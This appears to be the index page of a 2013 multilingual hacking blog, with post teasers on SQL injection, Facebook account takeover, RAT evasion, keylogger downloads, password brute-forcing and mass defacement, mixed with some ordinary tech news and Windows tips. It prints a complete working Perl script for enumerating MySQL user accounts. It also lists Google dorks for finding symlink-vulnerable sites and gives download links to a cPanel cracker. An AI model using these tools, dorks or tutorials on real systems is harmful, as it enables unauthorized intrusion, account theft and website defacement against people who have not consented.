vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

# Exploit Title: vBulletin 5 Beta XX SQLi 0day

# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"

# Date: 24/03/2013

# Exploit Author: Orestis Kourides

# Vendor Homepage: www.vbulletin.com

# Software Link:

# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28

# Tested on: Linux

# CVE : None

READ MORE »

Exploit Facebook Via External Plugins and Modules

#############################################################
# Title: Exploit Facebook Via External Plugins and Modules  
# Exploitation: Manually (use your brain ^_^)
# Date:  28/03/2013 
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################

READ MORE »

DNS Hijacking

Trong một bài viết trước Juno_okyo's Blog đã giới thiệu về DNS Spoofing. Và giờ tiếp tục với DNS Hijacking:

Here is a beautiful Tut From my dear friend H4x4rwOw on DNS HIJACKING
Recommended to download and watch
Download Here
Note:- Only for Educational purpose

List Of Top 5 Pentration Testing Operating System’s Based On Linux

If you are in search of good Pentration Testing operating system then you are at right place because in this post I am going to introduce you with Top 5 penetration testing Operating System’s Based On Linux. First of all i want to tell you something about Penetration Testing :

” It is that process in which an individual/professional can evaluate the security of a computer system or network by applying the attacks. These professionals have legal rights to do this task as their purpose is only to examine the network security instead of doing any harm.”
READ MORE »

WEP Cracking using Fern Wifi Cracker

So lets begin ...

Go to backtrack --> exploitation tools --> wireless exploitation tools --> 

WLAN exploitation --> fern-wifi-cracker

Now select the wireless interface you have ( it can be wlan0, wlan1 etc..)

READ MORE »

[SQLMAP] SQL Injection utilizando método POST

En esta entrada breve y simple, se detallaran los pasos que realizaremos cuando necesitemos explotar una vulnerabilidad de Sql Injection, que mayormente se encuentran en algunos servidores basados en SQL Server y Oracle. Estas vulnerabilidades son típicas en los LOGIN'S Administrativos, ya que como debemos de saber,  que cuando ingresamos el usuario y password estos datos se envían a través del método POST, por lo tanto puede existir la posibilidad de que al ingresar datos falsos o algunos bypasses, esta nos pueda mostrar algún error que nos permita identificar la vulnerabilidad, por tanto se puede explotar automatizadamente utilizando SQLMAP ejecutando comandos para enviar la petición en POST y no en GET como se "acostumbra".

READ MORE »

1337day Inj3ct0r Exploit Database Hacked by Z0mbi3_Ma and SQL_Master

A Well Known Exploit Database Website 1337day (www.1337day.com) hacked and defaced by hackers with the handle  SQL_Master and Z0mbi3_Ma. Website is restored. Original website was not defaced (http://1337day.com) but www Subdomain of the website.

READ MORE »

Hacker Trung Quốc đánh cắp dữ liệu VN

Đại tá Trần Văn Hòa, Phó cục trưởng Cục Cảnh sát phòng chống tội phạm sử dụng công nghệ cao (Bộ Công an), vừa trở thành đối tượng tấn công có chủ ý của hacker Trung Quốc.

Đây là thông tin được chính đại tá Trần Văn Hòa công bố tại Hội thảo về an toàn thông tin Security World 2013 được tổ chức hôm qua (26.3) tại Hà Nội.


Nguồn gốc tấn công vào email của lãnh đạo Cục Cảnh sát phòng chống tội phạm sử dụng công nghệ cao được xác định đến từ Trung Quốc - Nguồn: Đại tá Trần Văn Hòa
Giải mã một email lạ
READ MORE »

[VIDEO] Thử nghiệm Slowloris+ với WebHunter 4.5

[VIDEO] Thử nghiệm Slowloris+ với WebHunter 4.5

1337w0rm cPanel Cracker / Bruter

DOWNLOAD: http://www.sendspace.com/file/xmuibl
TUTORIAL: http://www.youtube.com/watch?v=4U-XzSFo2lg

Get Symlink Enabled Websites With Google

These are some of the best google dorks to get symlink enabled websites through Google :)

1. inurl:"/root/home/*/public_html/"
2. inurl:"/sym/root/"
3. inurl:"/*.php?sws=sym" 0r inurl:"/*.php?*=sym" intext:"[ Symlink File ]"

Make your RAT 100% FUD just with Winrar

In this thread i am going to teach you how to make a RAT a complete FUD with the help of WINRAR. even if your target doesn't have Winrar installed.

Ok let's start.

What you need for this Tutorial:
1. A Winrar encrypted file (Your server encrypted with Winrar)
2. Portable version of Winrar.

READ MORE »

Phrozen Keylogger Lite v1.0 download

Phrozen Keylogger Lite is finally available, developed by Dark comet RAT developer. Phrozen Keylogger Lite is a powerful and user friendly keylogger especially created for Microsoft Windows systems. Phrozen Keylogger Lite is compatible with all currently supported versions of Windows, which effectively means Windows XP to the recently released Windows 8.

READ MORE »

Biggest password cracking wordlist with millions of words

One of the biggest and very comprehensive collection of 1,493,677,782 word for Password cracking list released for download. The wordlists are intended primarily for use with password crackers such as hashcat, John the Ripper and with password recovery utilities.

Defuse Security have released the wordlist of 4.2 GiB (compressed) or 15 GiB (uncompressed) used by their Crackstation project.

READ MORE »

MySQL User Enumeration Script

# MySQL User Account Enumeration Utility
# When an attacker authenticates using an incorrect password
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
# the mysql server will respond with a different message than Access Denied, what makes
# User Account Enumeration possible.
# The Downside is that the attacker has to reconnect for each user enumeration attempt
#20000 user accounts in 7 minutes
#Mon Jan 16 09:00:18 UTC 2012
#Mon Jan 16 09:07:26 UTC 2012
#root@vs2067037:~# wc -l MEDIUM.LST
#21109 MEDIUM.LST
#A usernames.txt wordlist is included in this package
#examples:
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: administrator@host
#
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: admin@host
#

use IO::Socket;
use Parallel::ForkManager;
$|=1;

if ($#ARGV != 1) {
print "Usage: mysqlenumerate.pl <target> <wordlist>\n";
exit;
}

$target = $ARGV[0];
$wordlist = $ARGV[1];
$numforks = 50;
$pm = new Parallel::ForkManager($numforks);

open FILE,"<$wordlist";
unlink '/tmp/cracked';

@users = ();
$k=0;
while(<FILE>) {
chomp;
$_ =~ s/\r//g;
$users[$k++] = $_;
}
close FILE;
$k2 = 0;
for(;;) {
for ($k=0;$k<$numforks;$k++) {
$k2++;
if (($k2 > $#users) or (-e '/tmp/cracked')) {
exit;
}
my $pid = $pm->start and next;
$user = $users[$k2];
goto further;
again:
print "Connect Error\n";
further:
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '3306',
Proto => 'tcp') || goto again;
recv($sock, $buff, 1024, 0);

$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".
"\x4e\x5f\x51\x55\x45\x4d\x45\x00";
$buf = chr(length($buf)-3). $buf;
print $sock $buf;
$res = recv($sock, $buff, 1024, 0);
close($sock);
if ($k2 % 100 == 0) {
print $buff."\n";
}
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}
unless (-e '/tmp/cracked') {
open FILE, ">/tmp/cracked";
close FILE;
print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
open FILE, ">jackpot";
print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
exit;
}
}
$pm->wait_all_children;
}

List username: http://www.mediafire.com/?6dpwj1p86u56vyc

cat z.lst.rtf | awk '{ print $2 }' > your.lst

Phương pháp tấn công MITM

MITM [ man in the middle ] - Là một phương thức tấn công của attacker,trong đó attacker đứng giữa,nhận thông tin trao đổi giữa 2 đầu truyền tin.Bên A truyền cho bên B,thông tin sẽ đi từ A qua attacker rồi mới đến B .Và tất nhiên attacker có thể xem và thay đổi thôi tin trước khi truyền đến đích.Hôm nay capuchino có đọc qua tài liệu về các thiết bị giao tiếp mạng .Trong đó có cơ bản là Hub, Switch,Router.....

Trong đó cơ chế bảo mật đi từ thấp đến cao.Hub chỉ chia ra các cổng,nhưng các gói tin đi qua nó,đều qua các cổng hết,đến khi nào nó đến máy thì mới xem đó có phải là đích đến thích hợp hay ko.Điều này rất nguy hiểm trong mạng Lan .Vì như thế nghĩa là bất kì máy nào cũng có thể bắt các gói tin này.

READ MORE »

TP-Link HTTP/TFTP Backdoor

About the TP-Link Router

TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router.

Tested Firmware
READ MORE »

"Điệp viên" châu Âu xuất hiện tại Việt Nam

Bản đồ phân bố FinSpy của Citizen Lab.

FinFisher – phần mềm gián điệp được thiết kế để "đánh chặn hợp pháp", dành riêng cho các cơ quan thực thi pháp luật ở châu Âu – bất ngờ bị phát hiện đã phát tán ra đến 25 quốc gia, trong số đó có Việt Nam.

READ MORE »

Hack Remote P.C. using latest java vulnerability

Hack Remote P.C. using latest java vulnerability

AVA APPLET JMX REMOTE CODE EXECUTION:

This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Any O.S. Which is running java 7 update 10 is exploitable. Just attacker require metasploit.

READ MORE »

Chrome, Firefox và iTunes chứa nhiều lỗ hổng bảo mật nhất

Theo báo cáo mới nhất của hãng bảo mật Secunia, số lỗ hổng bị phát hiện trong năm 2012 tăng khá nhanh, trong đó trình duyệt Chrome, Firefox và iTunes của Apple chứa nhiều lỗ hổng nhất.

Số lượng các lỗ hổng bảo mật được phát hiện trên các sản phẩm phần mềm tăng 5% trong năm 2013, nhưng hầu hết các ứng dụng phổ biến nhất trên hệ thống máy tính để bàn lại có ít lỗ hổng hơn trong năm nay.

READ MORE »

Trộm dữ liệu của 120.000 người sử dụng iPad bị kết án 3,5 năm tù

Andrew Auernheimer

Một tin tặc máy tính đã bị kết án 3,5 năm tù hôm 18/3 vì tội lấy cắp thông tin của 120.000 người sử dụng iPad, trong đó có cả các iPad của các thị trưởng thành phố lớn, một nguồn tin mạng lưới truyền hình và một người có vai vế về phim ảnh tại Hollywood.

Andrew Auernheimer, 27 tuổi, đã bị bồi thẩm đoàn của tòa án Neward, New Jersy kết án vào tháng 11/2012 vì tội đăng nhập các server của nhà mạng AT&T mà không được phép, và lấy đi thông tin cá nhân.

READ MORE »

How to Get Facebook's New News Feed

World's #1 social network Facebook has updated a new design on it's news feed. Facebook developer team regularly introduce new features to keep it's current place among social network sites. Now they have concentrated on Facebook news feed. Facebook news feed is turned into a new look, now you can focus on stories from your friends. Earlier, all the stories appeared in your news feed but now Facebook allows you to filter stories with following options.

READ MORE »

Secrets of Hacking ~ The Basics

Many of us try to hack sites every day and most of time we fail.
But there are some peoples with great talent to hack any site and we thought " GOD ... I want to be like him"
This happens to all of us ... right ?
But the thing which irritates us most is when a PRO hacker can not hack a site and same site is hacked by a new hacker who has just started learning hacking , and we thought " how the hell he did it ? "
This is my friend where you hack the PRO by being noob.
READ MORE »

DNS Spoofing

Here is a beautiful Tut From my dear friend H4x4rwOw on DNS SPOOFING

 
Recommended to download and watch
Download Here
Note:- Only for Educational purpose

SHELL UPLOAD + BACK CONNECT + ROOTING + MASS DEFACE

HERE WE GO FINALLY MY MASTER TUT ON SHELL UPLOAD+BACK CONNECT+ROOTING+ MASS DEFACE ALL IN ONE VIDEO.. :)
READ MORE »

Tấn công HTTP Session Sidejacking

Các công cụ sử dụng:

• Trình duyệt: Firefox (bắt buộc)
• Thực hiện ARP Poison Routing: Cain&Abel
• Sniff dữ liệu và tái dựng TCP Stream: Wireshark
• Cookie injection: Firefox và Add-on GreaseMonkey, Cookie Injector script (down file đính kèm)

Bạn phải tự tìm hiểu cách cài đặt các ứng dụng trên. Cách cài đặt add-on Grease Monkey và user script Cookie injector vui lòng xem phần phụ lục
READ MORE »

Google hỗ trợ khôi phục web bị tấn công

Google vừa ra mắt trang web hỗ trợ những nhà quản trị web có các trang web bị tấn công khôi phục lại hoạt động.

Trang web http://www.google.com/webmasters/hacked/ gồm các bài viết và video được thiết kế để giúp các nhà quản trị web nhận biết, chẩn đoán và phục hồi trang web sau khi bị tấn công.

READ MORE »

How to do Hydra (Brute force Attack) to hack any E-mail Password

How to do Hydra (Brute force Attack) to hack any E-mail Password



Brute-force attack

A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

READ MORE »

How I Hacked Any Facebook Account... Again!

This is my second post regarding Facebook OAuth Vulnerabilities,

just to clarify there is no need for any installed apps on the victim's account, Even if the victim has never allowed any application in his Facebook account I could still get full permission on his account via Facebook Messenger app_id (This bug works on any browser),
READ MORE »

Chrome OS “bất khả xâm phạm” tại cuộc thi hack Pwnium 3

Tại hội nghị bảo mật CanSecWest ở Vancouver, British Columbia, Mỹ tuần này, hệ điều hành Chrome của Google đã chứng tỏ là “bất khả xâm phạm” trong cuộc thi hacker Pwnium 3.

Google đã treo giải thưởng với tổng giá trị tới 3.141.590 USD. Nội dung cuộc thi là hacker phải tìm cách khai thác được các lỗ hổng trên Chrome OS chạy trên Chromebook Pixel mới ra mắt. Trong cuộc thi, hacker có thể dùng bất kì phần mềm nào, kể cả nhân hệ điều hành (kernel) và các trình điều khiển để hỗ trợ cho các cuộc tấn công của họ.

READ MORE »

How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App "Allow" Interaction)

Hi,

I decided to share one of my favorite flaws i discovered in  facebook.com, 

This flaw allowed me to take a full control over any Facebook account,
  
By exploiting this flaw I could steal unique access tokens that provides me full control over any Facebook account,

   

just to clarify there is no need for any installed apps on the victim's account, Even if the victim never allowed any application in his  Facebook account, I could still be getting full permissions (This bug works on any browser)

To make this exploit work, The victim only need to visit a webpage,
So OAuth is used by Facebook to communicate between Applications and Facebook users, Usally users must allow/accept the application request to access their account before the communication can start.

READ MORE »

Browsing Forums WITHOUT REGISTRATION

Sometimes we need to browse forum to read some articles and they asks to register to view the topic
so now you can skip the process of registration.

READ MORE »

Find any Facebook Profile from a Photo

For this tutorial, I'll be using some random persons Facebook that I found by searching her first name:

https://www.facebook.com/michelleephan
 
Step 1: Acquire a Facebook photo. 
READ MORE »

Auditando Servidores Web Joomla con Metasploit

Muchas veces cuando realizamos alguna Auditoria enfocada hacia Servidores Web, uno de los pasos mas importante que se debe realizar es Information Gathering (Recopilación de Información)  ya que esta es el paso más crítico de una prueba de seguridad de aplicaciones web que puede llevarse a cabo de muchas maneras diferentes, mediante el uso de herramientas públicas (motores de búsqueda), escáners, envío de simples peticiones HTTP o solicitudes especialmente diseñadas.

READ MORE »

PHP Audit - El Arte de encontrar 0-days en Aplicaciones Webs

Esta vez, vamos a ver algo sobre 0-days, gracias a un amigo con el seudónimo Join7 del foro ZentrixPlus donde ha realizado un tutorial en la cual explica detalladamente como encontrar 0-days en aplicaciones webs.

READ MORE »

Google gây sốc khi tiết lộ FBI thường xuyên bí mật theo dõi người dùng

Google đã khiến không ít người dùng cảm thấy sốc sau khi tiết lộ bí mật Ủy ban điều tra Liên bang Mỹ (FBI) thường xuyên yêu cầu “gã khổng lồ tìm kiếm” phải cung cấp thông tin người dùng của mình với mục đích… chống khủng bố.

READ MORE »

Người dùng Yahoo! Mail vẫn tiếp tục bị hacker tấn công

Bất chấp việc Yahoo! đã phát hành hai bản vá lỗi cho ứng dụng mail của họ để sửa lỗi bảo mật có thể dẫn đến tài khoản người dùng có thể bị hack, nhưng trong những tháng qua người dùng Yahoo! Mail vẫn tiếp tục báo cáo về việc tài khoản của họ bị xâm nhập.

READ MORE »

Khắc phục lỗi Script Error trong Yahoo! Messenger 11

Một lỗi khá phổ biến và không ít phiền toái khi sử dụng Yahoo! Messenger 11.

An error has occurred in the script on this page.
Line : 1
Char : 1
Error : Invalid character
Code : 0
URL : http://mi.adinterax.com/wrapper.js
Do you want to continue running scripts on this page ?

READ MORE »

Tổng hợp tất cả các công cụ cho hacking

Sau 1 thời gian lang thang trên các diễn đàn, mình sưu tầm được khá nhiều tool. Đây chỉ có khả năng rút ngắn thời gian, điều chính là bạn phải "nắm rõ vấn đề". Không dài dòng nữa nào.

TOOLS FOR DOWNLOAD AND INSTALLATION
READ MORE »

Bypassing Google Two Factor Authentication

Duo Security found a loophole in Google's authentication system that allowed them to Google's two factor authentication and gain full control over a user's Gmail account by abusing the unique passwords used to connect individual applications to Google accounts.

READ MORE »

WORDPRESS SHELL UPLOAD BYPASS

METHOD GIVEN BY MY DEAR FRIEND MAURITANIA ATTACKER TO BYPASS SHELL UPLOAD IN WORDPRESS

LET'S START
READ MORE »

Auto root 2013

Auto root 2013 Developped by Mauritania Attacker
www.mauritania-sec.com
https://www.facebook.com/mauritanie.forever
Usage:-
chmod 777 the script for example r00t.php
and then launch  ./r00t.php
READ MORE »

Exploiting a Web server - A complete tutorial by Mr. FreaK aka Silent Hacker

Hello Everyone ! Today I Mr. Freak aka Silent Hacker and am here to tell you about " How to exploit any server " . This is guide for the beginners to learn How to Hack the website by Exploiting the Server .  Here are some common question asked by the Newbie regarding this.
READ MORE »

HACKING WINDOWS IN MINUTE'S VIA BACKTRACK

RESEARCH PAPER ON HACKING WIN-7 THROUGH BACKTRACK (METASPLOIT)

  

So let's just begin with our hacking

1. Open the terminal of the Backtrack

READ MORE »

TRUTH OF FACEBOOK HACKING

ARTICLE ON EXPOSING FACEBOOK HACKING OR THE TRUTH BEHIND THE FACEBOOK HACKING

In the depth of crisis, hacking over the INTERNET is still a very big problem. First of all I would like to throw some light on what basically hacking is and who the hackers actually are. Hackers are the persons who actually secure your system or the network are the WHITE HAT persons, the people who actually do hacking are crackers or the BLACK HAT persons. I am writing this article just to aware the people, what actually the hacking is and how they can protect themselves from hackers and their children from being exploited.

READ MORE »

REAL SQL - V0.3 (SQLi Finder)

Here comes a post after a long holidays from blogging due to my exams. This is about one of my favs SQli scanner. Its called Real SQLi. Just found this so thought of posting here.
What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!
This is the main GUI of the application and in later screenshots I will show you it's features.

READ MORE »

Cách phát hiện sớm các tập tin có mã độc của tin tặc

Để phát hiện sớm các tập tin có cài mã độc tin tặc gửi đến, bạn cần làm, cần lưu ý những điều sau đây:

- Hiển thị phần mở rộng của tập tin lên trong Windows.
- Thấy người lạ gửi tập tin .RAR, ZIP hay các dạng nén khác như 7z, gzip, tar, cab, z, arj,... thì phải nghi ngờ và hết sức cẩn trọng.
- Nếu giải nén ra và thấy tên tập tin thật dài thì rất là đáng nghi và phải kiểm lại ngay coi tập tin thuộc dạng nào.
- Nếu nhận được một tập tin lạ, không bao giờ lấy quyết định chỉ dựa vào hình icon của tập tin. Phải kiểm lại phần mở rộng xem thuộc dạng nào.

READ MORE »

Dễ dàng tìm lại mật khẩu các ứng dụng trong máy với PasswdFinder

Thông thường, các tài khoản đăng nhập trên các website bạn sẽ tự nhớ trong đầu hoặc lưu chúng thông qua các chương trình quản lý tài khoản như LastPass, nhưng ngặc nỗi không phải ai cũng biết đến LastPass hay các chương trình cùng loại. Một ngày đẹp trời nào đó, không may bạn quên bén đi mật khẩu đăng nhập một trang web hay ứng dụng nào đó do lâu ngày không sử dụng đến.
READ MORE »

Tùy chỉnh thời gian đếm ngược khi cài add-on trong Firefox

Khi bạn cài đặt một add-on trong Firefox, một hộp thoại thông báo sẽ hiển thị thời gian đếm ngược tại nút Install, mặc định là 5 giây chờ. Đối với những ai không thích việc chờ đợi thì 5 giây cũng là thời gian gây khó chịu cho họ và mình biết rất nhiều người rất muốn vô hiệu hóa thời gian đếm ngược này. Tuy nhiên, bạn nên biết rằng thời gian chờ này lại là một điểm an ninh khá quan trọng cho trình duyệt của bạn, tốt nhất đừng nên vô hiệu nó mà hãy tăng thời gian này lên nếu bạn đang sử dụng máy tính chung với nhiều người.
READ MORE »

Hướng dẫn tìm, di chuyển và xóa tập tin trùng lặp trên Windows

Theo thời gian, rất nhiều tập tin được lưu trữ vào ổ cứng, chúng được tạo ra từ những tập tin tải về từ internet, từ tài liệu chia sẻ hay hình ảnh sao chép từ máy ảnh, điện thoại... Và rất có thể có những tập tin trùng lập mà bạn không biết. Tuy rằng đa số các tập tin loại này thường không chiếm nhiều dung lượng nhưng cũng có ngoại lệ đặc biệt là những tập tin hình ảnh từ máy ảnh hay điện thoại. Nếu việc tìm và xóa các tập tin trung lặp bằng cách thủ công sẽ khiên bạn mất khá nhiều thời gian. Bạn có thể sử dụng các phần mềm như GDuplicateFinder hay Fast Duplicate File Finder, hôm nay GenK sẽ tiếp tục giới thiệu đến các bạn một ứng dụng tương tự có tên là Free Duplicate Finder.

READ MORE »

Di chuyển tất cả file cùng phần mở rộng tự động với File Mover

Di chuyển hay copy một số file từ folder này sang folder khác để tiện sắp xếp, quản lý là một việc làm hết sức nhàm chán nếu bạn thực hiện hoàn toàn thủ công. Thông thường để làm việc này, trước tiên bạn phải tìm tất cả các tập tin cần di chuyển trong một hay nhiều folder khác nhau rồi sẽ chép chúng vào folder đích mới. Trong một vài trường hợp, bạn sẽ bỏ xót một số file nếu dữ liệu nằm trong nhiều folder trong từng ổ đĩa khác nhau.
READ MORE »

62 phím tắt cực hữu dụng trên Gmail

Thao tác bằng phím tắt trên Gmail giúp giảm thời gian thao tác với hòm thư.

Gmail không chỉ là một trang web, mà còn được coi như một ứng dụng web. Các ứng dụng thường thấy được cài trên máy tính của bạn đều hỗ trợ phím tắt để thao tác thuận tiện hơn, Gmail cũng vậy. Mẹo này đặc biệt hữu ích với những người luôn phải đọc nhiều email của khách hàng, đối tác...
READ MORE »

FontLoader - Công cụ cài Font tạm thời cho Windows

Nếu bạn đang là một nhà thiết kế web hay thiết kế đồ họa thì chắc hẳn bạn cũng cảm thấy tầm quan trọng của Font chữ vì nó giúp khách hàng chú ý nhiều hơn đến tác phẩm của bạn, từ đó yêu cầu bạn phải thường xuyên sưu tầm, cài đặt các font chữ mới. Hiện nay có hàng triệu font chữ khác nhau cũng như có hàng trăm hàng ngàn font chữ mới được tạo ra mỗi ngày, việc sưu tầm có thể đơn giản nhưng nếu nhồi nhét tất cả vào thư mục Fonts của Windows thì xem ra không phải việc làm đúng đắn. Bạn có thể cài và sử dụng sau đó gỡ bỏ ra để giảm tải cho Windows nhưng việc đó khá mất thời gian cũng như phiên hà.

READ MORE »

Thủ thuật ẩn mọi cửa sổ đang mở với WinLock

Khi sử dụng máy vi tính, có những lúc bạn không muốn cho người khác biết bạn đang làm gì. Có thể là các tài liệu quan trọng, hay các video "mật" mà bạn không muốn cho ai biết. Trong Windows, để khoá máy tính nhanh, bạn có thể sử dụng tổ hợp phím tắt Windows + L. Vậy nếu bạn muốn đi ra ngoài, hoặc cho ai đó mượn máy, mà không muốn người ta thấy các tài liệu của mình thì sao? Đây là lúc bạn cần phần mềm WinLock. Công cụ nhỏ gọn này được thiết kế để ẩn các cửa sổ đang mở bằng mật khẩu. Ngay cả khi bạn đang xem video trên Youtube hay xem một bộ phim bằng VLC, WinLock có thể ẩn đi tất cả. Bạn có thể kích hoạt chương trình bằng tổ hợp phím tắt, và các cửa sổ sẽ tự động được khoá và ẩn xuống dưới thanh taskbar.

READ MORE »

Giấu dữ liệu bí mật vào file nhạc với phần mềm Deep Sound

Deep Sound (DS) là một chương trình giấu thư miễn phí dùng để nhúng một thông điệp ẩn bên trong các tập tin âm thanh chất lượng cao flac và wav. Người nhận chỉ nhận được thông điệp khi có mật khẩu giải mã và phải mở bằng chính DS. Bạn có thể nhúng tất cả các loại file thông dụng như file ảnh PNG, JPG, BMP, file ZIP, RAR, DOC, DOCX, TXT, EXE, MP3, FLV…

READ MORE »

Mở hơn 30 định dạng file nhanh chóng chỉ với 1 phần mềm duy nhất

Bạn nhận được một file văn bản định dạng .docx tạo ra bởi phiên bản MS-Word 2007 trở về sau nhưng ngặc nỗi máy bạn chỉ cài bộ Office 2003 thôi, chẳng lẽ bây giờ phải sử dụng chương trình chuyển .docx sang .doc hay cài thêm bộ plugin hỗ trợ đọc .docx trên Word 2003 của Microsoft? Điều đó đôi khi thật phiền phức vì bạn không có nhu cầu chỉnh sửa gì file văn bản đó, chỉ muốn xem nội dung chúng thôi…
READ MORE »

13 tính năng hữu ích của Google ít người biết đến

Ngoài chức năng tìm kiếm tuyệt vời, Google còn cung cấp nhiều tính năng nâng cao mà ít người sử dụng biết đến, như giúp bạn tính toán với các phép tính số học, xem thời tiết, xem tỷ số trận đấu, lịch thi đấu, chuyển đổi các đơn vị chiều cao, cân nặng, chuyển độ F sang độ C, chuyển đổi tiền tệ, xem địa chỉ IP máy tính của bạn, xem giờ… và rất nhiều tính năng hữu dụng khác nữa. Cùng điểm qua từng tính năng thú vị này nhé.

READ MORE »

Lổ hổng HTML 5 cho phép website tải đầy dữ liệu vào ổ cứng của bạn

Một sinh viên ngành khoa học máy tính tại trường Stanford (Mỹ) có tên Feross Aboukhadijeh mới đây vừa khám phá ra một lỗ hổng trong trình duyệt Chrome, Safari (bản trên iOS và máy tính), Opera, và IE có thể tạo điều kiện để một website nào đó đưa rất nhiều dữ liệu (của chính trang web đó) vào máy tính người dùng mà không cần được sự cho phép. Theo sinh viên nay, lỗ hổng có thể cho phép website ghi tới 1GB dữ liệu trong 16 giây vào chiếc MacBook Pro Retina được trang bị ổ SSD.

READ MORE »

Vì sao Java vẫn không bị khai tử mặc dù liên tục bị hack?

Thời gian gần đây, một loạt các công ty lớn hàng đầu trên thế giới như Facebook, Apple và mới nhất là Microsoft, lần lượt trở thành nạn nhân của các hacker (nhiều nghi vấn là các hacker đến từ Trung Quốc).

Hệ thống máy tính của những ông lớn này đều bị hacker thâm nhập chủ yếu thông qua một con đường là Java. Và không chỉ mới đây mà trong quá khứ, rất nhiều cuộc tấn công của hacker đều nhằm vào Java trên máy tính người dùng.

READ MORE »

Java lại dính lỗi bảo mật để cài đặt trojan vào máy người dùng

Theo các chuyên gia bảo mật đến từ FireEye, các hacker đang khai thác một lỗ hổng Java cũ nhưng chưa được vá lỗi nhằm lây nhiễm malware lên máy tính người dùng.

Cụ thể, lỗ hổng Java này đang được hacker khai thác để cài đặt một loại trojan điều khiển từ xa có tên McRat. Các phiên bản Java mà hacker nhắm tới gồm Java 1.6 bản update 41 và 1.7 bản update 15.

READ MORE »